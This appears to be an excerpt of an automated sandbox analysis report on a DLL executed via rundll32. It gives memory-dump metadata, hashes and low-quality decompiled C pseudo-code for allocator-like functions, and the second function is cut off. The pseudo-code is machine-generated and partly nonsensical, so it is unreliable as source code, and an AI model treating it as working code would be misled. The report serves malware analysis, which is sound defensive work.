                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExclusiveLock$AcquireEnvironmentReleaseVariable
                                                                                                                                              • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                              • API String ID: 3930940220-326518326
                                                                                                                                              • Opcode ID: fd1b59a49137068a8d5af78d40b12080516677ab6484274ef55f48a6ff5ff713
                                                                                                                                              • Instruction ID: 1255250568616fdb1b067a0f8827e2b4b64fb63e8cbf77a82080cf7173530325
                                                                                                                                              • Opcode Fuzzy Hash: fd1b59a49137068a8d5af78d40b12080516677ab6484274ef55f48a6ff5ff713
                                                                                                                                              • Instruction Fuzzy Hash: 6EE19931200A4881FBE6CB15A8583E933E1BB4CBE4F54C129E99A077E5DF39C78D9740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180043390 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 173nativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoMemoryQuerySystemVirtual
                                                                                                                                              • String ID: 0$0
                                                                                                                                              • API String ID: 1215726182-203156872
                                                                                                                                              • Opcode ID: 0d9ec0aa7df9e69efc5099f9c96a2ed0cd5ff2f7441afa02b1168f541cfda641
                                                                                                                                              • Instruction ID: 3816f6c14556ef1ce77444642041de0b1adea15a5f34b34bba5f90865609b624
                                                                                                                                              • Opcode Fuzzy Hash: 0d9ec0aa7df9e69efc5099f9c96a2ed0cd5ff2f7441afa02b1168f541cfda641
                                                                                                                                              • Instruction Fuzzy Hash: 2D513672315E1881FF929B11E8453DAA3A1A78C7E8F15D121BE89037D4DE3CD64DCB84
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180044BF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109nativelibraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConditionMask$ErrorMemoryQueryVirtual$AddressHandleInfoLastModuleProcStatusVerifyVersionWin32
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 160550979-4108050209
                                                                                                                                              • Opcode ID: fe12a7b33023418ca1b7bcf139ed7e7a575ba318fc702c071c4175bd4da4f816
                                                                                                                                              • Instruction ID: b389064ee7abf14af476c619c0ece9970c6d5188fee2f5df4d10004b21c2056c
                                                                                                                                              • Opcode Fuzzy Hash: fe12a7b33023418ca1b7bcf139ed7e7a575ba318fc702c071c4175bd4da4f816
                                                                                                                                              • Instruction Fuzzy Hash: CF41D473600E5881FBA6DB15A8843D9A690E789BF8F158315FE680B7D4DF3CC689CB04
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800400E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89nativelibraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConditionMask$ErrorMemoryQueryVirtual$AddressHandleInfoLastModuleProcStatusVerifyVersionWin32
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 160550979-4108050209
                                                                                                                                              • Opcode ID: e41c849a52253eb05c543276abbc64de0942c457c0e3b381f20ae18b2b0c0e37
                                                                                                                                              • Instruction ID: 84cbf13cfb10f264a3077734af9c5d05900b5fc9380b81b59a60343279eea786
                                                                                                                                              • Opcode Fuzzy Hash: e41c849a52253eb05c543276abbc64de0942c457c0e3b381f20ae18b2b0c0e37
                                                                                                                                              • Instruction Fuzzy Hash: 0F31ED31214A5841FBE68B2998483DBA6A0E74C7F8F218315BE78126E5DF3CC689CB04
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180004A80 Relevance: 10.3, APIs: 8, Instructions: 341COMMONCrypto
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                              			E00000001180004A80(long long __rcx, long long __rdx, void* __r9) {
				signed int _v72;
				long long _v80;
				long long _v88;
				void* _v1520;
				char _v1528;
				signed long long _v1536;
				char _v2968;
				long long _v2976;
				signed int _v2984;
				signed int _v2992;
				long long _v3000;
				long long _v3008;
				long long _v3016;
				long long _v3024;
				long long _v3032;
				long long _v3040;
				void* _v3048;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t202;
				intOrPtr _t211;
				intOrPtr _t218;
				long long _t231;
				intOrPtr _t235;
				intOrPtr _t242;
				long long _t249;
				intOrPtr* _t265;
				void* _t271;
				struct _CRITICAL_SECTION* _t274;
				void* _t278;
				signed long long _t280;
				signed long long _t281;
				signed long long _t282;
				void* _t286;
				intOrPtr* _t296;
				long long _t297;
				signed long long _t314;
				intOrPtr _t315;
				intOrPtr* _t327;
				signed long long _t328;
				signed long long _t329;
				intOrPtr _t331;
				struct _CRITICAL_SECTION* _t335;
				short* _t336;
				signed long long _t338;
				intOrPtr _t342;
				signed long long _t344;
				struct _CRITICAL_SECTION* _t353;
				signed int* _t354;
				intOrPtr _t359;
				intOrPtr* _t360;
				struct _CRITICAL_SECTION* _t362;
				intOrPtr _t364;
				signed long long _t373;
				void* _t375;
				signed long long _t376;
				struct _CRITICAL_SECTION* _t383;
				intOrPtr _t385;
				struct _CRITICAL_SECTION* _t387;
				struct _CRITICAL_SECTION* _t390;
				signed long long _t394;
				struct _CRITICAL_SECTION* _t396;
				signed long long _t397;

				goto 0x80004a90;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t376 = _t375 - 0xbc8;
				_t354 =  *0x8011f718; // 0x18017b428
				_v72 =  *_t354 ^ _t376;
				_v3048 = __rcx;
				if (__rcx == 0) goto 0x80004ff5;
				_v3040 = __rdx;
				_t193 = E000000011800080F0(_t202);
				if (_t193 == 0) goto 0x80004f93;
				if (_v3040 == 0) goto 0x80004aef;
				r8d = 0x870;
				0x8011d5e0();
				_t336 = _v3048;
				 *_t336 = 0;
				asm("movaps xmm0, [0x11a570]");
				asm("movups [edi+0x18], xmm0");
				asm("movaps xmm0, [0x11a575]");
				asm("movups [edi+0x28], xmm0");
				asm("movaps xmm0, [0x11a57a]");
				asm("movups [edi+0x38], xmm0");
				 *((long long*)(_t336 + 0x48)) = 0x1000;
				_t231 =  *0x8017b008; // 0x100
				 *((long long*)(_t336 + 0x50)) = _t231;
				asm("movaps xmm0, [0x11a56c]");
				asm("movups [edi+0x8], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movups [edi+0x58], xmm0");
				asm("movups [edi+0x68], xmm0");
				asm("movups [edi+0x78], xmm0");
				EnterCriticalSection(_t274);
				 *((intOrPtr*)(_t336 + 0x60)) =  *((intOrPtr*)(_t336 + 0x60)) +  *0x8017c2d0;
				LeaveCriticalSection(_t362);
				EnterCriticalSection(_t335);
				_v3032 =  *0x8017c270 +  *0x8017c238;
				 *((intOrPtr*)(_t336 + 0x78)) =  *((intOrPtr*)(_t336 + 0x78)) +  *0x8017c2b8;
				LeaveCriticalSection(_t353);
				EnterCriticalSection(_t383);
				r8d = 0x598;
				0x8011d5e0();
				_t296 =  *0x8017c8b8;
				if (_t296 == 0) goto 0x80004c4a;
				_v88 = 1;
				_v1528 = _t296;
				 *0x1 =  *0x1 + _t193;
				 *0x1 =  *0x1 + _t193;
				_t297 =  *_t296;
				if (_t297 == 0) goto 0x80004c23;
				_v88 = 0x1f0f2e6600000002;
				 *((long long*)(_t376 + 0xf879733000000618)) = _t297;
				_t235 = _v88;
				_t24 = _t235 - 1; // 0x0
				if ( *((intOrPtr*)(_t376 + 0x610 + _t24 * 8)) != 0) goto 0x80004bf0;
				_v80 = 0x8017c8c0;
				if (_t235 == 0) goto 0x80004c4a;
				_t211 =  *((intOrPtr*)(_t376 + 0x610 + (_t235 + 0xffffffff) * 8));
				if (_t211 != 0) goto 0x80004d06;
				LeaveCriticalSection(_t387);
				_t364 =  *((intOrPtr*)(_v3048 + 0x40));
				if (_t211 == 0) goto 0x80004fc7;
				goto 0x80004fcd;
				asm("o16 nop [cs:eax+eax]");
				_t278 = _v3008 + _v3024;
				_t338 = _v2992 << 0xc;
				LeaveCriticalSection(_t390);
				_t242 = _v3048;
				 *((intOrPtr*)(_t242 + 0x58)) =  *((intOrPtr*)(_t242 + 0x58)) + _v3016;
				 *((intOrPtr*)(_t242 + 0x60)) =  *((intOrPtr*)(_t242 + 0x60)) + _t278;
				 *((intOrPtr*)(_t242 + 0x70)) =  *((intOrPtr*)(_t242 + 0x70)) + _t338;
				 *((intOrPtr*)(_t242 + 0x68)) =  *((intOrPtr*)(_t242 + 0x68)) + (_v2984 << 0xc) - _t338 + _t278 + _t387 + _t364;
				 *((intOrPtr*)(_t242 + 0x80)) =  *((intOrPtr*)(_t242 + 0x80)) + _t364;
				 *((intOrPtr*)(_t242 + 0x78)) =  *((intOrPtr*)(_t242 + 0x78)) + _t387;
				 *((long long*)(_t242 + 8)) =  *((long long*)(_t242 + 8)) + 1;
				_t195 = E00000001180008990(_t242,  &_v1528, 0);
				_t385 = _t242;
				if (_t242 == 0) goto 0x80004c4a;
				_t61 = _t385 + 0x18; // 0x18
				_v3000 = _t61;
				EnterCriticalSection(_t396);
				_v3016 =  *((intOrPtr*)(_t385 + 0x40));
				_v2984 =  *((intOrPtr*)(_t385 + 0x48));
				_v3024 =  *((intOrPtr*)(_t385 + 0x50));
				_v3008 =  *((intOrPtr*)(_t385 + 0x58));
				_v2992 =  *((intOrPtr*)(_t385 + 0x80));
				r15d = 0;
				r13d = 0;
				goto 0x80004d77;
				asm("o16 nop [cs:eax+eax]");
				_t397 = _t396 + 1;
				if (_t397 == 0x2d) goto 0x80004c90;
				_t394 = _t397 + _t397 * 2 << 4;
				r8d = 0x598;
				0x8011d5e0();
				_t249 =  *((intOrPtr*)(_t385 + _t394 + 0xa0));
				if (_t249 == 0) goto 0x80004ef0;
				_v1536 = 1;
				_v2976 = _t249;
				 *_t249 =  *_t249 + _t195;
				 *_t249 =  *_t249 + _t195;
				 *((intOrPtr*)(_t249 - 0x75)) =  *((intOrPtr*)(_t249 - 0x75)) + _t197;
				 *((intOrPtr*)(_t249 - 0x7b)) =  *((intOrPtr*)(_t249 - 0x7b)) + _t197;
				 *(__r9 - 0x73) =  *(__r9 - 0x73) << 0x4b;
				 *((intOrPtr*)( &_v2968 + 0x608248c)) =  *((intOrPtr*)( &_v2968 + 0x608248c)) +  &_v2968;
				 *_t249 =  *_t249 + _t195;
				 *((long long*)(_t376 + 0x20f87b3000000070)) = _t249;
				_t280 = _v1536;
				_t93 = _t280 - 1; // 0x0
				if ( *((intOrPtr*)(_t376 + 0x68 + _t93 * 8)) != 0) goto 0x80004dc0;
				if (_t280 == 0) goto 0x80004ef0;
				_t97 = _t280 - 1; // 0x0
				if ( *((intOrPtr*)(_t376 + 0x68 + _t97 * 8)) == 0) goto 0x80004ef3;
				_t105 = _t280 - 1; // 0x0
				_t342 =  *((intOrPtr*)(_t376 + 0x68 + _t105 * 8));
				_t218 = _t342;
				if (_t218 == 0) goto 0x80004e9e;
				_t344 =  *(_t342 + 8) & 0xfffffffe;
				if (_t218 == 0) goto 0x80004e9e;
				_t110 = _t280 + 1; // 0x2
				_v1536 = _t110;
				 *(_t376 + 0x68 + _t280 * 8) = _t344;
				_t281 = _v1536;
				_t116 = _t281 - 1; // 0x0
				_t327 =  *((intOrPtr*)(_t376 + 0x68 + _t116 * 8));
				if (_t327 == 0) goto 0x80004ec0;
				_t328 =  *_t327;
				if (_t328 == 0) goto 0x80004ec0;
				_t120 = _t281 + 1; // 0x2
				_v1536 = _t120;
				 *(_t376 + 0x68 + _t281 * 8) = _t328;
				goto 0x80004e60;
				_t329 = _t281;
				if ( *((intOrPtr*)(_t376 + 0x68 + _t328 * 8)) ==  *_t344) goto 0x80004ed0;
				_v1536 = _t329;
				if (_t329 == 0) goto 0x80004ef7;
				_t130 = _t329 - 1; // -2
				_t282 = _t130;
				if ( *((intOrPtr*)(_t376 + 0x68 + _t282 * 8)) != 0) goto 0x80004e90;
				goto 0x80004e93;
				asm("o16 nop [eax+eax]");
				if (_t282 != 0) goto 0x80004ed3;
				goto 0x80004ef7;
				asm("o16 nop [cs:eax+eax]");
				_t134 = _t282 + 1 - 1; // -3
				if ( *((intOrPtr*)(_t376 + 0x68 + _t134 * 8)) != 0) goto 0x80004e15;
				goto 0x80004ef7;
				asm("o16 nop [cs:eax+eax]");
				_t331 =  *((intOrPtr*)(_t385 + _t394 + 0x98));
				if (_t331 == 0) goto 0x80004f17;
				_t373 = 0 +  *(_t331 + 0xc) *  *(_t385 + _t394 + 0xa8);
				_t359 = _v3040;
				if (_t359 == 0) goto 0x80004d60;
				_t265 = _t385 + _t394 + 0xc4;
				_t286 = (_t397 << 4) + (_t397 << 4) * 2;
				 *((long long*)(_t359 + _t286)) =  *((intOrPtr*)(_t385 + _t286 + 0xa8));
				 *((intOrPtr*)(_t359 + _t286 + 8)) =  *((intOrPtr*)(_t359 + _t286 + 8)) + 1;
				 *((intOrPtr*)(_t359 + _t286 + 0x10)) =  *((intOrPtr*)(_t359 + _t286 + 0x10)) +  *_t265;
				 *((intOrPtr*)(_t359 + _t286 + 0x18)) =  *((intOrPtr*)(_t359 + _t286 + 0x18)) + _t373;
				_t314 =  *_t265;
				 *((intOrPtr*)(_t359 + _t286 + 0x20)) =  *((intOrPtr*)(_t359 + _t286 + 0x20)) + ( *((intOrPtr*)(_t385 + _t286 + 0xb0)) -  *((intOrPtr*)(_t265 - 4))) * _t314;
				 *((long long*)(_t359 + _t286 + 0x28)) =  *((intOrPtr*)(_t385 + _t286 + 0xb0));
				goto 0x80004d60;
				asm("xorps xmm0, xmm0");
				asm("movups [eax+0x70], xmm0");
				asm("movups [eax+0x60], xmm0");
				asm("movups [eax+0x50], xmm0");
				asm("movups [eax+0x40], xmm0");
				asm("movups [eax+0x30], xmm0");
				asm("movups [eax+0x20], xmm0");
				asm("movups [eax+0x10], xmm0");
				asm("movups [eax], xmm0");
				 *((long long*)(_v3048 + 0x80)) = 0;
				goto 0x80004ff5;
				_t360 =  *0x8011f718; // 0x18017b428
				_t271 = (_t314 << 0xc) + (_t314 << 0xc) * 2;
				_t315 = _v3048;
				 *((long long*)(_t315 + 0x58)) = _v3032 + _t314;
				 *((intOrPtr*)(_t315 + 0x78)) =  *((intOrPtr*)(_t315 + 0x78)) + _t271;
				 *((intOrPtr*)(_t315 + 0x68)) =  *((intOrPtr*)(_t315 + 0x68)) - _t271;
				if ( *_t360 != (_v72 ^ _t376)) goto 0x8000501c;
				return _t195 / _t373;
			}



































































                                                                                                                                              0x180004a80
                                                                                                                                              0x180004a85
                                                                                                                                              0x180004a86
                                                                                                                                              0x180004a87
                                                                                                                                              0x180004a88
                                                                                                                                              0x180004a89
                                                                                                                                              0x180004a8a
                                                                                                                                              0x180004a8b
                                                                                                                                              0x180004a8c
                                                                                                                                              0x180004a8d
                                                                                                                                              0x180004a8e
                                                                                                                                              0x180004a8f
                                                                                                                                              0x180004a9c
                                                                                                                                              0x180004aa3
                                                                                                                                              0x180004ab0
                                                                                                                                              0x180004ab8
                                                                                                                                              0x180004ac0
                                                                                                                                              0x180004ac6
                                                                                                                                              0x180004acb
                                                                                                                                              0x180004ad2
                                                                                                                                              0x180004ae0
                                                                                                                                              0x180004ae2
                                                                                                                                              0x180004aea
                                                                                                                                              0x180004aef
                                                                                                                                              0x180004af4
                                                                                                                                              0x180004af9
                                                                                                                                              0x180004b00
                                                                                                                                              0x180004b04
                                                                                                                                              0x180004b0b
                                                                                                                                              0x180004b0f
                                                                                                                                              0x180004b16
                                                                                                                                              0x180004b1a
                                                                                                                                              0x180004b22
                                                                                                                                              0x180004b29
                                                                                                                                              0x180004b2d
                                                                                                                                              0x180004b34
                                                                                                                                              0x180004b38
                                                                                                                                              0x180004b3b
                                                                                                                                              0x180004b3f
                                                                                                                                              0x180004b43
                                                                                                                                              0x180004b58
                                                                                                                                              0x180004b68
                                                                                                                                              0x180004b76
                                                                                                                                              0x180004b82
                                                                                                                                              0x180004b8b
                                                                                                                                              0x180004b97
                                                                                                                                              0x180004b9e
                                                                                                                                              0x180004ba7
                                                                                                                                              0x180004bb1
                                                                                                                                              0x180004bb9
                                                                                                                                              0x180004bbe
                                                                                                                                              0x180004bc8
                                                                                                                                              0x180004bce
                                                                                                                                              0x180004bd9
                                                                                                                                              0x180004bec
                                                                                                                                              0x180004bee
                                                                                                                                              0x180004bf0
                                                                                                                                              0x180004bf6
                                                                                                                                              0x180004bfb
                                                                                                                                              0x180004c04
                                                                                                                                              0x180004c0c
                                                                                                                                              0x180004c13
                                                                                                                                              0x180004c21
                                                                                                                                              0x180004c2a
                                                                                                                                              0x180004c34
                                                                                                                                              0x180004c41
                                                                                                                                              0x180004c44
                                                                                                                                              0x180004c51
                                                                                                                                              0x180004c5c
                                                                                                                                              0x180004c6e
                                                                                                                                              0x180004c7c
                                                                                                                                              0x180004c81
                                                                                                                                              0x180004c9e
                                                                                                                                              0x180004ca8
                                                                                                                                              0x180004cb1
                                                                                                                                              0x180004cb7
                                                                                                                                              0x180004cc1
                                                                                                                                              0x180004cc5
                                                                                                                                              0x180004cc9
                                                                                                                                              0x180004cd9
                                                                                                                                              0x180004cdd
                                                                                                                                              0x180004ce4
                                                                                                                                              0x180004ce8
                                                                                                                                              0x180004cf5
                                                                                                                                              0x180004cfa
                                                                                                                                              0x180004d00
                                                                                                                                              0x180004d06
                                                                                                                                              0x180004d0b
                                                                                                                                              0x180004d10
                                                                                                                                              0x180004d1b
                                                                                                                                              0x180004d25
                                                                                                                                              0x180004d2f
                                                                                                                                              0x180004d39
                                                                                                                                              0x180004d46
                                                                                                                                              0x180004d4b
                                                                                                                                              0x180004d50
                                                                                                                                              0x180004d53
                                                                                                                                              0x180004d55
                                                                                                                                              0x180004d69
                                                                                                                                              0x180004d71
                                                                                                                                              0x180004d7b
                                                                                                                                              0x180004d7f
                                                                                                                                              0x180004d8c
                                                                                                                                              0x180004d91
                                                                                                                                              0x180004d9c
                                                                                                                                              0x180004da2
                                                                                                                                              0x180004dad
                                                                                                                                              0x180004dbb
                                                                                                                                              0x180004dbd
                                                                                                                                              0x180004dbf
                                                                                                                                              0x180004dc2
                                                                                                                                              0x180004dc5
                                                                                                                                              0x180004dca
                                                                                                                                              0x180004dd0
                                                                                                                                              0x180004dd4
                                                                                                                                              0x180004dd9
                                                                                                                                              0x180004de0
                                                                                                                                              0x180004deb
                                                                                                                                              0x180004def
                                                                                                                                              0x180004df8
                                                                                                                                              0x180004e03
                                                                                                                                              0x180004e34
                                                                                                                                              0x180004e37
                                                                                                                                              0x180004e3c
                                                                                                                                              0x180004e3f
                                                                                                                                              0x180004e45
                                                                                                                                              0x180004e49
                                                                                                                                              0x180004e4b
                                                                                                                                              0x180004e4e
                                                                                                                                              0x180004e57
                                                                                                                                              0x180004e60
                                                                                                                                              0x180004e67
                                                                                                                                              0x180004e6a
                                                                                                                                              0x180004e72
                                                                                                                                              0x180004e74
                                                                                                                                              0x180004e7a
                                                                                                                                              0x180004e7c
                                                                                                                                              0x180004e7f
                                                                                                                                              0x180004e88
                                                                                                                                              0x180004e8d
                                                                                                                                              0x180004e95
                                                                                                                                              0x180004e9c
                                                                                                                                              0x180004e9e
                                                                                                                                              0x180004ea7
                                                                                                                                              0x180004ea9
                                                                                                                                              0x180004ea9
                                                                                                                                              0x180004eb4
                                                                                                                                              0x180004eb8
                                                                                                                                              0x180004eba
                                                                                                                                              0x180004ec2
                                                                                                                                              0x180004ec4
                                                                                                                                              0x180004ec6
                                                                                                                                              0x180004ed3
                                                                                                                                              0x180004ede
                                                                                                                                              0x180004ee4
                                                                                                                                              0x180004ee6
                                                                                                                                              0x180004ef7
                                                                                                                                              0x180004f02
                                                                                                                                              0x180004f10
                                                                                                                                              0x180004f17
                                                                                                                                              0x180004f30
                                                                                                                                              0x180004f3a
                                                                                                                                              0x180004f47
                                                                                                                                              0x180004f53
                                                                                                                                              0x180004f57
                                                                                                                                              0x180004f5e
                                                                                                                                              0x180004f63
                                                                                                                                              0x180004f68
                                                                                                                                              0x180004f7c
                                                                                                                                              0x180004f89
                                                                                                                                              0x180004f8e
                                                                                                                                              0x180004f93
                                                                                                                                              0x180004f9b
                                                                                                                                              0x180004f9f
                                                                                                                                              0x180004fa3
                                                                                                                                              0x180004fa7
                                                                                                                                              0x180004fab
                                                                                                                                              0x180004faf
                                                                                                                                              0x180004fb3
                                                                                                                                              0x180004fb7
                                                                                                                                              0x180004fba
                                                                                                                                              0x180004fc5
                                                                                                                                              0x180004fcd
                                                                                                                                              0x180004fdd
                                                                                                                                              0x180004fe4
                                                                                                                                              0x180004fe9
                                                                                                                                              0x180004fed
                                                                                                                                              0x180004ff1
                                                                                                                                              0x180005006
                                                                                                                                              0x18000501b

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave$ExclusiveLock$AcquireRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1716202990-0
                                                                                                                                              • Opcode ID: 687a4d91716ae31c7e397a0d9c73340cd741542314d0447d3bf84ee1578a5028
                                                                                                                                              • Instruction ID: 11ea761f1340dd122197621a2f64081a3726af6925ae4a53a448d526ce023892
                                                                                                                                              • Opcode Fuzzy Hash: 687a4d91716ae31c7e397a0d9c73340cd741542314d0447d3bf84ee1578a5028
                                                                                                                                              • Instruction Fuzzy Hash: 21F1B273615B8886EB95CF15E4843AAB3A1F79CBD8F188225EE8C47758DF38D598C700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000000018003F7A0 Relevance: 9.2, APIs: 6, Instructions: 178memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual$InfoSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1426219593-0
                                                                                                                                              • Opcode ID: 104826944ba0cdadfe847fea5c5ab6c5e54af7e8761902eaea178d065ef85b72
                                                                                                                                              • Instruction ID: 8db59b7e1efcee0bba38d80c88154e4434ad1a458cb3c60306701015a741d196
                                                                                                                                              • Opcode Fuzzy Hash: 104826944ba0cdadfe847fea5c5ab6c5e54af7e8761902eaea178d065ef85b72
                                                                                                                                              • Instruction Fuzzy Hash: 46719D32210A4896FBA3DF12E8443EA63A0F74CBD4F458116EE5A577A4DF39DA4AC740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800036A0 Relevance: 9.0, APIs: 7, Instructions: 222COMMONCrypto
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                              			E000000011800036A0(void* __ebx, void* __edi, void* __ebp, void* __rcx, signed int __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _v72;
				long long _v80;
				signed int _v88;
				char _v104;
				void* _t68;
				signed int _t70;
				void* _t75;
				void* _t83;
				void* _t84;
				signed long long _t104;
				signed int _t112;
				signed long long _t113;
				signed long long _t115;
				intOrPtr _t116;
				signed long long _t119;
				void* _t120;
				void* _t164;
				unsigned long long _t169;
				signed long long _t180;
				signed long long _t184;
				void* _t191;
				signed int _t196;
				signed long long _t198;
				void* _t201;
				unsigned long long _t203;
				void* _t205;
				signed long long _t206;

				_t194 = __r11;
				_t69 = __ebx;
				_t206 = __rdx;
				_t205 = __rcx;
				if (__r8 - 8 > 0) goto 0x800036cc;
				if (__r8 - 2 >= 0) goto 0x800036df;
				goto 0x800036ef;
				if (__r8 - 0x1f0 > 0) goto 0x80003706;
				goto 0x80003721;
				asm("dec eax");
				goto 0x80003721;
				if (__r8 - 0xf00 > 0) goto 0x800037f8;
				_t169 = __r8 + 0x000000ff & 0xffffff00;
